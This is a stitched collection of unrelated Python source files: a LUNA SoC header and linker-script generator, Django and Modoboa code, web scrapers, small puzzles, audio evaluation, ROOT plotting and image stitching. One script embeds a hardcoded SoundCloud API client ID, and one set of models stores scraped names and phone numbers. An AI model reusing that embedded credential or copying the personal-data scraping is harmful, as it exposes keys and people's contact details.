emit("static inline uint32_t irq_getie(void)")
emit("{")
emit(" return (read_csr(mstatus) & MSTATUS_MIE) != 0;")
emit("}")
emit("")
emit("static inline void irq_setie(uint32_t ie)")
emit("{")
emit(" if (ie) {")
emit(" set_csr(mstatus, MSTATUS_MIE);")
emit(" } else {")
emit(" clear_csr(mstatus, MSTATUS_MIE);")
emit(" }")
emit("}")
emit("")
emit("static inline uint32_t irq_getmask(void)")
emit("{")
emit(" return read_csr(0x330);")
emit("}")
emit("")
emit("static inline void irq_setmask(uint32_t value)")
emit("{")
emit(" write_csr(0x330, value);")
emit("}")
emit("")
emit("static inline uint32_t pending_irqs(void)")
emit("{")
emit(" return read_csr(0x360);")
emit("}")
emit("")
def generate_c_header(self, macro_name="SOC_RESOURCES", file=None, platform_name="Generic Platform"):
""" Generates a C header file that simplifies access to the platform's resources.
Parameters:
macro_name -- Optional. The name of the guard macro for the C header, as a string without spaces.
file -- Optional. If provided, this will be treated as the file= argument to the print()
function. This can be used to generate file content instead of printing to the terminal.
"""
def emit(content):
""" Utility function that emits a string to the targeted file. """
print(content, file=file)
# Create a mapping that maps our register sizes to C types.
types_for_size = {
4: 'uint32_t',
2: 'uint16_t',
1: 'uint8_t'
}
# Emit a warning header.
emit("/*")
emit(" * Automatically generated by LUNA; edits will be discarded on rebuild.")
emit(" * (Most header files phrase this 'Do not edit.'; be warned accordingly.)")
emit(" *")
emit(f" * Generated: {datetime.datetime.now()}.")
emit(" */")
emit("\n")
emit(f"#ifndef __{macro_name}_H__")
emit(f"#define __{macro_name}_H__")
emit("")
emit("#include <stdint.h>\n")
emit("#include <stdbool.h>")
emit("")
emit("//")
emit("// Environment Information")
emit("//")
emit("")
emit(f"#define PLATFORM_NAME \"{platform_name}\"")
emit("")
# Emit our constant data for all Minerva CPUs.
self._emit_minerva_basics(emit)
emit("//")
emit("// Peripherals")
emit("//")
for memory_map, resource, address, size in self.resources():
# Get peripheral name
if memory_map.name is None:
name = resource.name
else:
name = "{}_{}".format(memory_map.name, resource.name)
# Always generate a macro for the resource's ADDRESS and size.
emit(f"#define {name.upper()}_ADDRESS (0x{address:08x}U)")
emit(f"#define {name.upper()}_SIZE ({size})")
# If we have information on how to access this resource, generate convenience
# macros for reading and writing it.
if hasattr(resource, 'access'):
c_type = types_for_size[size]
# Generate a read stub, if useful...
if resource.access.readable():
emit(f"static inline {c_type} {name}_read(void) {{")
emit(f" volatile {c_type} *reg = ({c_type} *){name.upper()}_ADDRESS;")
emit(f" return *reg;")
emit(f"}}")
# ... and a write stub.
if resource.access.writable():
emit(f"static inline void {name}_write({c_type} value) {{")
emit(f" volatile {c_type} *reg = ({c_type} *){name.upper()}_ADDRESS;")
emit(f" *reg = value;")
emit(f"}}")
emit("")
emit("//")
emit("// Interrupts")
emit("//")
for irq, peripheral in self._irqs.items():
# Function that determines if a given unit has an IRQ pending.
emit(f"static inline bool {peripheral.name}_interrupt_pending(void) {{")
emit(f" return pending_irqs() & (1 << {irq});")
emit(f"}}")
# IRQ masking
emit(f"static inline void {peripheral.name}_interrupt_enable(void) {{")
emit(f" irq_setmask(irq_getmask() | (1 << {irq}));")
emit(f"}}")
emit(f"static inline void {peripheral.name}_interrupt_disable(void) {{")
emit(f" irq_setmask(irq_getmask() & ~(1 << {irq}));")
emit(f"}}")
emit("#endif")
emit("")
def generate_ld_script(self, file=None):
""" Generates an ldscript that holds our primary RAM and ROM regions.
Parameters:
file -- Optional. If provided, this will be treated as the file= argument to the print()
function. This can be used to generate file content instead of printing to the terminal.
"""
def emit(content):
""" Utility function that emits a string to the targeted file. """
print(content, file=file)
# Insert our automatically generated header.
emit("/**")
emit(" * Linker memory regions.")
emit(" *")
emit(" * Automatically generated by LUNA; edits will be discarded on rebuild.")
emit(" * (Most header files phrase this 'Do not edit.'; be warned accordingly.)")
emit(" *")
emit(f" * Generated: {datetime.datetime.now()}.")
emit(" */")
emit("")
emit("MEMORY")
emit("{")
# Add regions for our main ROM and our main RAM.
for memory in [self.bootrom, self._main_ram]:
# Figure out our fields: a region name, our start, and our size.
name = "ram" if (memory is self._main_ram) else "rom"
start, size = self._range_for_peripheral(memory)
if size:
emit(f" {name} : ORIGIN = 0x{start:08x}, LENGTH = 0x{size:08x}")
emit("}")
emit("")
def log_resources(self):
""" Logs a summary of our resource utilization to our running logs. """
# Resource addresses:
logging.info("Physical address allocations:")
memory_map = self.bus_decoder.bus.memory_map
for resource_info in memory_map.all_resources():
start = resource_info.start
end = resource_info.end
peripheral = resource_info.resource
logging.info(f" {start:08x}-{end:08x}: {peripheral}")
logging.info("")
# IRQ numbers
logging.info("IRQ allocations:")
for irq, peripheral in self._irqs.items():
logging.info(f" {irq}: {peripheral.name}")
logging.info("")
# Main memory.
if self._build_bios:
memory_location = self.main_ram_address()
logging.info(f"Main memory at 0x{memory_location:08x}; upload using:")
logging.info(f" flterm --kernel <your_firmware> --kernel-addr 0x{memory_location:08x} --speed {self._uart_baud}")
logging.info("or")
logging.info(f" lxterm --kernel <your_firmware> --kernel-adr 0x{memory_location:08x} --speed {self._uart_baud}")
logging.info("")
def main_ram_address(self):
""" Returns the address of the main system RAM. """
start, _ = self._range_for_peripheral(self._main_ram)
return start
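# A minimal usage sketch (not part of the original file); the sizes, addresses, and the
# placeholder ROM contents below are assumptions chosen purely to illustrate the API above.
def _example_build_soc(uart_pins):
    soc = SimpleSoC(clock_frequency=int(60e6))
    soc.add_rom(data=[0] * 1024, size=0x4000, addr=0x0000_0000)   # boot code placeholder
    soc.add_ram(size=0x8000)                                      # main program RAM
    soc.add_bios_and_peripherals(uart_pins=uart_pins)             # BIOS, UART, timer, scratchpad
    soc.generate_c_header(macro_name="SOC_RESOURCES")             # emit the resource header to stdout
    return soc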
|
"""Postfix relay domains extension forms."""
from django.db.models.signals import pre_save, post_save
from modoboa.lib.form_utils import WizardStep
from modoboa.transport import forms as tr_forms, models as tr_models
class DisableSignals(object):
"""Context manager to disable signals."""
def __init__(self):
self.stashed_signals = {}
self.disabled_signals = [pre_save, post_save]
def __enter__(self):
for signal in self.disabled_signals:
self.disconnect(signal)
def __exit__(self, exc_type, exc_val, exc_tb):
for signal in list(self.stashed_signals.keys()):
self.reconnect(signal)
def disconnect(self, signal):
self.stashed_signals[signal] = signal.receivers
signal.receivers = []
def reconnect(self, signal):
signal.receivers = self.stashed_signals.get(signal, [])
del self.stashed_signals[signal]
class RelayDomainWizardStep(WizardStep):
"""A custom wizard step."""
def check_access(self, wizard):
"""Check if domain is a relay domain."""
return wizard.steps[0].form.cleaned_data["type"] == "relaydomain"
class RelayDomainFormGeneral(tr_forms.TransportForm):
"""A form to display transport."""
class Meta:
model = tr_models.Transport
exclude = [
"creation", "pattern", "next_hop", "enabled",
"_settings"
]
def save(self, *args, **kwargs):
"""Custom save method."""
domain = kwargs.pop("domain", None)
if domain.type != "relaydomain":
# We don't want to recreate the transport we just deleted it
# (post_save signal).
return None
instance = super(RelayDomainFormGeneral, self).save()
instance.pattern = domain.name
instance.save()
if not domain.transport:
domain.transport = instance
with DisableSignals():
domain.save(update_fields=["transport"])
return instance
|
# parent class for battle options
class BattleOptions:
def __init__(self, name, fighter, targets):
self.name = name
self.fighter = fighter
self.targets = targets
    def generate_round_actions(self):
        # Subclasses are expected to override this to produce the fighter's actions for a round.
        return
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.utils import timezone
# Create your models here.
MANAGED = True
class ScrapModel(models.Model):
name = models.TextField()
source = models.CharField(max_length=100, null=False, default='FlipKey')
    created_date = models.DateField(default=timezone.now)
@property
def count_has_numbers(self):
return self.scrap_model.filter(phone__isnull=False).count()
@property
def count_all(self):
return self.scrap_model.all().count()
def __unicode__(self):
return self.name
def __str__(self):
return self.name
class Meta:
managed = MANAGED
db_table = 'scrap_model'
class ScrapDetails(models.Model):
scrap = models.ForeignKey(ScrapModel, models.CASCADE, related_name='scrap_model', db_column='scrap_mode_id')
name = models.CharField(max_length=150, null=True)
f_name = models.CharField(max_length=150, null=True)
l_name = models.CharField(max_length=150, null=True)
phone = models.CharField(max_length=150, null=True)
url = models.URLField()
def __unicode__(self):
return self.name
def __str__(self):
return self.name
class Meta:
managed = MANAGED
db_table = 'scrap_details'
class SalesForce(models.Model):
sales_force_id = models.IntegerField()
sales_force_phone = models.CharField(max_length=250,db_index=True)
class Meta:
managed = MANAGED
db_table = 'sales_force'
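# A brief usage sketch (not part of the original file); the values are hypothetical and
# only illustrate the reverse relation ("scrap_model") and the count properties above:
#
# scrap = ScrapModel.objects.create(name="listings", source="FlipKey")
# ScrapDetails.objects.create(scrap=scrap, name="John", phone="555-0100", url="http://example.com")
# scrap.count_all          # -> 1
# scrap.count_has_numbers  # -> 1 (details with a non-null phone)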
|
from django import http
def test_view(request):
return http.HttpResponse()
|
import json
import time

import pandas as pd
from selenium import webdriver

driver = webdriver.Firefox(executable_path='C:\\Program Files\\Mozilla Firefox\\geckodriver-v0.29.0-win64\\geckodriver.exe')
team_links = list()
for year in range(2008,2021):
driver.get(f'https://moneyball.insidesport.co/teams.php?section={year}')
team_links.extend([link.find_element_by_tag_name('a').get_attribute('href') for link in driver.find_elements_by_class_name('logo-team')])
def teamYearStats(link):
driver.get(link)
time.sleep(3)
try:
players = driver.find_elements_by_class_name('info-player')
pl_list = list()
for pl in players:
player = dict()
player['jersey_no'] = pl.find_element_by_class_name('number-player').text
player['name'] = pl.find_element_by_tag_name('h4').find_element_by_tag_name('a').text.split('\n')[0].strip()
player['role'] = pl.find_element_by_tag_name('h4').find_elements_by_tag_name('span')[0].text
player['salary_rank'] = pl.find_element_by_tag_name('h4').find_elements_by_tag_name('span')[1].text.split(':')[1].strip()
player['salary'] = pl.find_elements_by_tag_name('li')[1].text.split('\n')[1].strip()[2:]
player['team'] = driver.find_element_by_tag_name('h1').text.title()
player['season'] = link[-4:]
pl_list.append(player)
return pl_list
except Exception as e:
print('Error in scraping player details for-', str(e),link.split('?')[1])
return None
output = list()
i = 0
for team in team_links:
i += 1
res = teamYearStats(team)
if res:
output.extend(res)
print(i)
cols = list(output[0].keys())
df = pd.DataFrame(output, columns=cols)
df.to_csv('player_salaries.csv', index=True)
|
# Read the rectangle dimensions (A x B) and the square side C, then compute how many
# CxC squares fit inside the rectangle and how much area is left uncovered.
A = int(input("A= "))
B = int(input("B= "))
C = int(input("C= "))
Number_squares = (A // C) * (B // C)
Unused_part = A * B - Number_squares * C ** 2
print(Number_squares)
print(Unused_part)
|
def result(num):
    # Count the numbers from 1 to num whose digits form an arithmetic progression;
    # every number below 100 trivially qualifies.
    if num < 100:
        return num
    cnt = 99
    for n in range(100, num + 1):
        digits = [int(digit) for digit in str(n)]
        if (digits[0] - digits[1]) == (digits[1] - digits[2]):
            cnt += 1
    return cnt
N = int(input())
print(result(N))
|
import util
import network
from librosa.util import find_files
from librosa.core import load,stft
import os.path
import const as C
import numpy as np
from pesq import pesq
from time import time
start = time()
PATH_MIR = C.PATH_EVAL
audiolist = find_files(PATH_MIR, ext="wav")
total_len = 0
gnsdr = gsir = gsar = np.zeros(2)
gpesq_inst = gpesq_vocal = 0
checkpoint = "checkpoints\checkpoint_54.model"
#checkpoint = "models\ck20200501UNET_34ep(Hop256).model"
i = 0
alpha = C.ALPHA
for audiofile in audiolist:
i = i + 1
if audiofile == audiolist[i-2]:
continue
fname = os.path.split(audiofile)[-1]
y, _ = load(audiofile, sr=None, mono=False)
inst = y[0, :]
mix = y[0, :] + y[1, :]
vocal = y[1, :]
#reconstruct predicted wave
mix_mag, mix_phase, mix_spec = util.LoadAudio(os.path.join(PATH_MIR,fname))
vocal_mag = np.abs(stft(vocal, n_fft=C.FFT_SIZE,hop_length=C.H,win_length=C.WIN_LENGTH).astype(np.float32))
vocal_mag /= np.max(vocal_mag)
inst_mag = np.abs(stft(inst, n_fft=C.FFT_SIZE,hop_length=C.H,win_length=C.WIN_LENGTH).astype(np.float32))
inst_mag /= np.max(inst_mag)
vocal_pred_spec = util.ComputeMask(mix_mag, mix_spec, alpha, unet_model=checkpoint, hard=False) #load model from checkpoints, in order to get t-f mask
inst_pred_spec = mix_spec - vocal_pred_spec
vocal_pred,len_cropped = util.SaveAudio("vocal-%s" % fname, vocal_pred_spec,vocal.shape[0])
inst_pred,_ = util.SaveAudio("inst-%s" % fname, inst_pred_spec,vocal.shape[0])
vocal_pred = vocal_pred * 100
inst_pred = inst_pred * 100
spec_cropped = min(vocal_mag.shape[1],vocal_pred_spec.shape[1])
#util.plot_spec(mix_mag[:,:spec_cropped],fname,datatype = 'mix')
#util.plot_spec(np.abs(vocal_pred_spec)[:,:spec_cropped],fname,datatype = 'vocal_predicted')
#util.plot_spec(np.abs(inst_pred_spec)[:,:spec_cropped],fname,datatype = 'inst_predicted')
#util.plot_spec(vocal_mag[:,:spec_cropped],fname,datatype = 'vocal_pure')
#util.plot_spec(inst_mag[:,:spec_cropped],fname,datatype = 'inst_pure')
# compute metrics, including SAR, SIR, NSDR, PESQ for both vocal and instrument
vocal = vocal[ :len_cropped]
inst = inst[ :len_cropped]
mix = mix[ :len_cropped]
#util.plot_wav(vocal_pred,fname,datatype = 'vocal_predicted')
#util.plot_wav(vocal,fname,datatype = 'vocal_pure')
#util.plot_wav(mix,fname,datatype = 'mix')
nsdr, sir, sar, pesq_inst, pesq_vocal = util.metrics(mix, inst, vocal, inst_pred, vocal_pred)
print(fname,pesq_vocal)
input()
total_len = total_len + len_cropped
gpesq_inst = gpesq_inst + len_cropped * pesq_inst
gpesq_vocal = gpesq_vocal + len_cropped * pesq_vocal
gnsdr = gnsdr + len_cropped * nsdr
gsir = gsir + len_cropped * sir
gsar = gsar + len_cropped * sar
#print('number of parameters:{}'.format(num_para))
gpesq_inst = gpesq_inst / total_len
gpesq_vocal = gpesq_vocal / total_len
gnsdr = gnsdr / total_len
gsir = gsir / total_len
gsar = gsar / total_len
end = time()
print("duration:{}".format(end - start))
print(checkpoint)
print("alpha:{}".format(alpha))
print("window_length:{}".format(C.WIN_LENGTH))
print("hop_length:{}".format(C.H))
print("PESQ_inst:{}\n PESQ_vocal:{}\n NSDR:{}\n SIR:{}\n SAR:{}".format(gpesq_inst, gpesq_vocal, gnsdr,gsir,gsar))
|
#! /usr/bin/env python
#import pdb
#pdb.set_trace()
import json
import urllib2
import argparse
import sys
username = ''
CLIENT_ID='f9387851ff8001b7abacd24a73fe1044'
def get_user_id(username, username_url):
"""
Get user id from username.
"""
try:
user_obj = urllib2.urlopen(username_url)
user_data = json.load(user_obj)
user_id = user_data['id']
except:
print "username invalid"
sys.exit(0)
return user_id
def get_user_info(username):
pass
def main():
parser = argparse.ArgumentParser(description='\
A sample program to grab user data from soundcloud')
parser.add_argument('-u', action='store',
dest='username',
help='Store the username')
results = parser.parse_args()
username = results.username
#pdb.set_trace()
#print username
username_url = 'http://api.soundcloud.com/users/'+username+'.json?client_id='+CLIENT_ID
    api_loc = ('http://api.soundcloud.com/users/'
               + str(get_user_id(username, username_url))
               + '/playlists/?client_id=' + CLIENT_ID)
#print get_user_id(username, username_url)
#print api_loc
#print username_url
#print get_user_id(username)
try:
json_obj = urllib2.urlopen(api_loc)
data = json.load(json_obj)
print data
#print len(data)
#print len(data)
#print (str(id(data)))
except:
print "username inresolved ... !!"
sys.exit(0)
# with open(str(username)+'.json', 'a') as f:
# for item in data:
# f.write("%s" % item)
# for i in item:
# print(i, item[i])
if __name__=="__main__":main()
|
# Plot Laser Runs
from ROOT import *
from plotDictionary import sipmDict, pindiodeDict, shuntSipms, shuntPindiodes
from ADCConverter import ADCConverter
import os
import mapping
from argparse import ArgumentParser
from array import array
def plotData(file1, file2, ch, type, runDir, plotDir, shunts):
# Batch Mode removes X-forwarding for canvas creation graphics
# This makes everything MUCH faster!
gROOT.SetBatch()
# Setup file names
if shunts:
saveFile = file2.split(".root")[0]
else:
saveFile = file2.split("bright/")[1]
saveFile = saveFile.split(".root")[0]
plotLabel = saveFile + '_' + ch
# Get Histograms from files
F1 = TFile(runDir + file1)
F2 = TFile(runDir + file2)
H1 = F1.Get(ch)
H2 = F2.Get(ch)
H1.SetName("H1")
H2.SetName("H2")
# Formatting
H1.SetLineColor(kRed)
H1.SetLineStyle(2)
H2.SetLineColor(kBlue)
H2.GetXaxis().SetTitle("ADC")
H2.GetYaxis().SetTitle("Events")
H2.SetTitle(type + " Response to Laser inserted in CU")
# Make a canvas
C1 = TCanvas("c1","c1")
C1.SetLogy()
H2.Draw()
H1.Draw("same")
# Make a label
label = TText(0.2, 0.8, plotLabel)
label.SetTextFont(43)
label.SetTextSize(25)
label.SetTextAngle(0) # positive and negative angles are good!
label.SetNDC()
label.Draw()
# Make a legend
leg = TLegend(0.8,0.6,0.93,0.8)
leg.SetHeader("Legend")
if shunts:
leg.AddEntry("H1","Shunt 0")
leg.AddEntry("H2","Shunt 31")
else:
leg.AddEntry("H1","Dark")
leg.AddEntry("H2","Bright")
leg.Draw()
# Save
C1.Modified()
C1.Update()
C1.SaveAs(runDir + plotDir + plotLabel + '.pdf')
def makePlots(runDir, plotDir, dictionary, shunts):
#file1 = "dark/uhtr62-2_dark.root"
#file2 = "bright/uhtr62-2_rbx11_cu32_bright.root"
#for ch in xrange(144):
# plotData(file1, file2, 'h'+str(ch), runDir)
for d in dictionary:
file1 = d['file1']
file2 = d['file2']
chList = d['ch']
ch_type = d['type']
for ch in chList:
plotData(file1, file2, ch, ch_type, runDir, plotDir, shunts)
# Return maximum ADC value for a histogram (final nonzero bin)
# update to accept channel list and return a list of max values...
# this will be more efficient than opening the root file for each channel
def oldFindMaxADC(rootFile, ch, verb=False):
# Get Histogram from file
F = TFile(rootFile)
H = F.Get(ch)
# Find Max ADC
numZeros = 0 # Count number of consecutive bins with value 0
Bin = 0 # Bin index 0 to 255
limit = 10 # Return once numZeros > limit
while Bin < 256:
b = H.GetBinContent(Bin)
if verb:
print "Bin %-3i: %.3f" % (Bin, b)
if b == 0:
numZeros += 1
else:
numZeros = 0
if numZeros > limit:
if Bin == limit:
return 0
else:
return Bin - limit - 1
Bin += 1
return Bin - 1 # Return bin in 0 to 255 range
# New Find Max that starts at ADC 256 and looks for bin with value > 1
def findMaxADC(rootFile, ch, verb=False):
if verb:
print "file: %s channel: %s" % (rootFile, ch)
# Get Histogram from file
F = TFile(rootFile)
H = F.Get(ch)
# Find Max ADC
Bin = 255 # starting bin; bin index 0 to 255
passingBins = 0 # number of consecutive bins greater than cutoff
required = 2 # required number of consecutive bins greater than cutoff
cutoff = 1 # cutoff for accepting value in bin
while Bin > 0:
b = H.GetBinContent(Bin)
if verb:
print "Bin %-3i: %.3f" % (Bin, b)
if b > cutoff:
passingBins += 1
else:
passingBins = 0
if passingBins >= required:
# return first nonzero bin
maxBin = Bin + passingBins - 1
if verb:
print "Max Bin: %-3i" % maxBin
return maxBin
Bin -= 1
if verb:
print "Max Bin: %-3i" % Bin
return Bin # Return Bin = 0
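# A possible batched variant (not in the original) following the earlier TODO about
# accepting a channel list: open the ROOT file once, scan every requested channel with
# the same consecutive-bin logic as findMaxADC, and return a {channel: max bin} dict.
def findMaxADCForChannels(rootFile, channels, cutoff=1, required=2):
    F = TFile(rootFile)
    maxima = {}
    for ch in channels:
        H = F.Get(ch)
        Bin = 255
        passingBins = 0
        maxBin = 0
        while Bin > 0:
            if H.GetBinContent(Bin) > cutoff:
                passingBins += 1
            else:
                passingBins = 0
            if passingBins >= required:
                maxBin = Bin + passingBins - 1
                break
            Bin -= 1
        maxima[ch] = maxBin
    return maxima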
def plotMax(runDir, dictionary):
gROOT.SetBatch()
maxADC = 256 + 16 * 4 # Max ADC from 0 to 256 with additional 64 to shift data to the left (makes room for labels)
nBins = maxADC / 16 # Number of bins is 320/16 = 20
H1 = TH1F("H1", "H1", nBins, 1, maxADC)
H2 = TH1F("H2", "H2", nBins, 1, maxADC)
for d in dictionary:
file1 = runDir + d['file1']
file2 = runDir + d['file2']
chList = d['ch']
ch_type = d['type']
for ch in chList:
for f in [file1, file2]:
maxBin = findMaxADC(f, ch, False)
#print "File: {0} | Channel: {1} | Max Bin: {2}".format(f, ch, maxBin)
if f == file1: # H1 and file1 are shunt 0
H1.Fill(maxBin)
if f == file2: # H2 and file2 are shunt 31
H2.Fill(maxBin)
print "Type: {0}".format(ch_type)
if ch_type == "SiPM":
maxY = 400
if ch_type == "Pindiode":
maxY = 20
# Formatting
H1.SetLineColor(kRed)
H1.SetLineStyle(2)
H1.SetAxisRange(0,maxY,"Y")
H2.SetLineColor(kBlue)
H2.GetXaxis().SetTitle("Max ADC")
H2.GetYaxis().SetTitle("No. " + ch_type)
H2.SetAxisRange(0,maxY,"Y")
H2.SetTitle("Max ADC Reached for " + ch_type)
# Make a canvas
C1 = TCanvas("c1","c1")
H2.Draw()
H1.Draw("same")
# Make a legend
leg = TLegend(0.8,0.6,0.93,0.8)
leg.SetHeader("Legend")
leg.AddEntry("H1","Shunt 0")
leg.AddEntry("H2","Shunt 31")
leg.Draw()
# Save
C1.Modified()
C1.Update()
C1.SaveAs(runDir + 'max_adc_' + ch_type + '.pdf')
# Table options are "sipm", "pd", and "pindiodes"
def makeTable(runDir, tables, runList, unit, stability=False):
if runDir[-1] != "/":
runDir += "/"
cuList = []
for directory in os.listdir(runDir):
if "CU" in directory:
cu = int(directory.split("CU_")[-1])
cuList.append(cu)
cuList.sort()
shuntList = [31]
pdList = list(i for i in xrange(6))
col_width = 10
adcConverter = ADCConverter(unit, 31) # unit and shunt
for table in tables:
cuBadChannels = {}
total_channels = 0
total_bad_channels = 0
print "Creating {0} table".format(table)
tfile = TFile(runDir + table + '.root', 'recreate')
tree = TTree('t1', 't1')
array_dict = {}
with open (runDir + table + "_array.h", 'w') as a:
with open (runDir + table + "_table.txt", 'w') as t:
if table == "sipm":
columns = ["cu", "rbx", "run", "rm", table + "_ch", "uhtr_ch", "shunt", "max_adc", "max_pc", "result"]
elif table == "pd":
columns = ["cu", "rbx", "run", table + "_ch", "uhtr_ch", "shunt", "max_adc", "max_pc", "result"]
for key in columns:
array_dict[key] = array('f', [ 0. ])
float_name = '{0}/F'.format(key)
tree.Branch(key, array_dict[key], float_name)
header_table = "".join(entry.ljust(col_width) for entry in columns) + "\n"
header_array = "{" + ",".join(columns) + "}\n"
t.write("# " + header_table)
#print header_table
array_string = ""
a.write("#include <vector>\n\n")
a.write("// " + header_array)
array_string += "std::vector< std::vector<double> > %s_array = {\n" % table
# Example Files
# new_cu_data/CU_15/rbx0_shunt31_pd_1.root
# new_cu_data/CU_15/rbx0_shunt31_uhtr1_1.root
# new_cu_data/CU_15/rbx0_shunt31_uhtr2_1.root
# order by cu, rbx, run, shunt, uHTR, rm, channel
for icu in cuList:
print "Processing CU {0}".format(icu)
# get RBX list from file names
rbxList = []
bad_channels = 0
for data_file in os.listdir(runDir + "CU_" + str(icu)):
if "rbx" in data_file and ".root" in data_file:
data_file = data_file.split("rbx")[-1]
data_file = data_file.split("_")[0]
rbx_int = int(data_file)
if rbx_int not in rbxList:
rbxList.append(rbx_int)
for irbx in rbxList:
for irun in runList:
for ishunt in shuntList:
RM = 0
for iuhtr in [1,2]:
if table == "pd" and iuhtr == 2:
continue #do not do pd twice
# It is important to only include SiPM / PD data in correct table
#if table == "sipm": iterFlag = "rbx%d_shunt%d_%d.root" % (irbx, ishunt, iuhtr)
#elif table == "pd": iterFlag = "rbx%d_shunt%d_pd.root" % (irbx, ishunt)
if table == "sipm": f = "%sCU_%d/rbx%d_shunt%d_uhtr%d_%d.root" % (runDir, icu, irbx, ishunt, iuhtr, irun)
elif table == "pd": f = "%sCU_%d/rbx%d_shunt%d_pd_%d.root" % (runDir, icu, irbx, ishunt, irun)
if not os.path.isfile(f):
continue # skip files that do not exist
#print "file: %s" % (f)
# RBX, CU and shunt are constant for one file
cu = "%d" % icu
run = "%d" % irun
rbx_full = "%02d" % irbx
rbx = "%d" % irbx
shunt = "%d" % ishunt
if shunt == "0": cutoff = 150
else: cutoff = 100
# RM, pindiode/sipm_ch, uHTR, uhtr_ch, max_adc will vary within a file
if table == "sipm":
chList = mapping.rbxSIPM[rbx_full][iuhtr-1]
elif table == "pd":
chList = mapping.rbxPD[rbx_full]
for i, channel in enumerate(chList):
# mask pin-diodes that do not have light
if stability:
if table == "pd":
if i > 1:
continue
else:
if table == "sipm":
if irun > 3:
continue
if table == "pd":
# runs 1, 2, and 3 are pin-diode chs 0, 1
if irun < 4:
if i > 1:
continue
# runs 4, 5, 6, and 7 are pin-diode chs 2, 3, 4, and 5
else:
if i != irun-2:
continue
rm_ch = str(i % 48)
pd_ch = str(i % 6)
if rm_ch == "0":
RM += 1
rm = "%d" % RM
# mask out 4 dark channels per RBX
# rbx0 has RM type 2 in slot 4 for stability run only!!!
masked_rm = rm
if masked_rm == "4":
masked_rm = "2"
if (masked_rm, rm_ch) in mapping.darkSipms:
#print "mask out channel: RM %s SiPM %s masked rm: %s" % (rm, rm_ch, masked_rm)
continue
uhtr_ch = channel.split("h")[-1]
max_adc = str(findMaxADC(f, channel, False))
max_charge = "%.2f" % adcConverter.linearize(max_adc)
total_channels += 1
if int(max_adc) >= cutoff:
result = "1"
else:
result = "0"
bad_channels += 1
total_bad_channels += 1
if table == "sipm":
row = [cu, rbx, run, rm, rm_ch, uhtr_ch, shunt, max_adc, max_charge, result]
if table == "pd":
row = [cu, rbx, run, pd_ch, uhtr_ch, shunt, max_adc, max_charge, result]
array_string += "{" + ", ".join(row) + "},\n"
row_string = "".join(entry.ljust(col_width) for entry in row)
t.write(row_string + "\n")
tree_string = ""
for i, key in enumerate(columns):
array_dict[key][0] = float(row[i])
tree_string += str(array_dict[key][0]) + " "
#print tree_string
tree.Fill()
#if result == "0":
# print row_string
if int(max_adc) > 240:
print row_string
        # calibration unit loop
cuBadChannels[icu] = bad_channels
# end of array
if array_string[-2:] == ",\n":
array_string = array_string[:-2] + "\n"
array_string += "};\n"
a.write(array_string)
# table loop
tfile.Write()
tfile.Close()
for c in sorted(cuBadChannels):
print "CU {0} : {1} {2} channels less than {3} ADC".format(c, cuBadChannels[c], table, cutoff)
print "Total: {0} {1} channels less than {2} ADC out of {3} total channels".format(total_bad_channels, table, cutoff, total_channels)
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--directory", "-d", default="Nov17-18_Final_CU_Data", help="directory containing directories with CU data")
parser.add_argument("--unit", "-u", default="fc", help="Charge unit (fc, pc, nc).")
options = parser.parse_args()
runDir = options.directory
unit = options.unit
# sipm: iterations 1, 2, 3
# pd: iterations 1, 2, 3, 4, 5, 6, 7
tables = ["sipm", "pd"]
runList = [1,4,5,6,7]
makeTable(runDir, tables, runList, unit)
# iterations for stability runs: iteration 1 is bad for CU6
#tables = ["sipm", "pd"]
#runList = list(i for i in xrange(2,7))
#makeTable(runDir, tables, runList, unit, stability=True)
#findMaxADC("CU_8/rbx0_shunt31_pd_1.root", "h0", True)
#findMaxADC("CU_8/rbx0_shunt31_pd_1.root", "h1", True)
|
# References
# https://web.archive.org/web/20140115053733/http://cs.bath.ac.uk:80/brown/papers/ijcv2007.pdf
# https://github.com/linrl3/Image-Stitching-OpenCV/blob/master/Image_Stitching.py
# https://living-sun.com/pt/python/708914-how-do-you-compute-a-homography-given-two-poses-python-opencv-homography.html
# https://towardsdatascience.com/image-panorama-stitching-with-opencv-2402bde6b46c
# https://towardsdatascience.com/image-stitching-using-opencv-817779c86a83
import cv2
import numpy as np
from simple_cb import simplest_cb
# Algorithm options
SIFT = "SIFT"
SURF = "SURF"
ORB = "ORB"
BRISK = "BRISK"
# Color options
GRAY = "GRAY"
COLORED = "COLORED"
# Overlay options
OVERLAY_MASK = "mask"
OVERLAY_WEIGHTED = "weighted"
# Configs
RATIO_DISTANCE = 0.67
MIN_MATCHES = 50
EQUALIZE_HISTOGRAM = False
SHOW_IMG_STEPS = False
SHOW_IMG_STEPS_DELAY = 10000
MATCH_ALGORITHM = SURF
OVERLAY_TYPE = OVERLAY_WEIGHTED
COLOR_TYPE = COLORED
class Image:
UID = 0
def __init__(self, d):
if isinstance(d, str):
if COLOR_TYPE == COLORED:
self.img = cv2.imread(d, cv2.IMREAD_COLOR)
self.img = simplest_cb(self.img, 1)
else:
self.img = cv2.imread(d, cv2.IMREAD_GRAYSCALE)
else:
self.img = d
self.loaded = isinstance(d, str)
self.uid = Image.UID
Image.UID += 1
def __eq__(self, other):
if isinstance(other, Image):
return other.uid == self.uid
else:
return super(self).__eq__(other)
def equalize_bgr(img):
img_yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV)
img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])
return cv2.cvtColor(img_yuv, cv2.COLOR_YUV2BGR)
def insert_border(imgs):
base_img = imgs[0]
height, width = base_img.img.shape[:2]
for img in imgs:
img.img = cv2.copyMakeBorder(img.img, height, height, width, width, cv2.BORDER_CONSTANT)
def remove_border(img):
if COLOR_TYPE == COLORED:
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
else:
gray = img
_, thresh = cv2.threshold(gray, 3, 255, cv2.THRESH_BINARY)
_, contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
x, y, w, h = cv2.boundingRect(contours[0])
new_img = [
layer[y:(y + h), x:(x + w)] for layer in cv2.split(img)
]
return cv2.merge(new_img)
def load_images(*args):
return [Image(img) for img in args]
def create_kp_describer_matcher(t):
assert t == SURF or t == SIFT or t == ORB or t == BRISK, "t param is invalid"
if SURF == t or SIFT == t:
if SURF == t:
kp_describer = cv2.xfeatures2d.SURF_create()
else:
kp_describer = cv2.xfeatures2d.SIFT_create()
index_params = {'algorithm': 0, 'trees': 5}
search_params = {'checks': 1000}
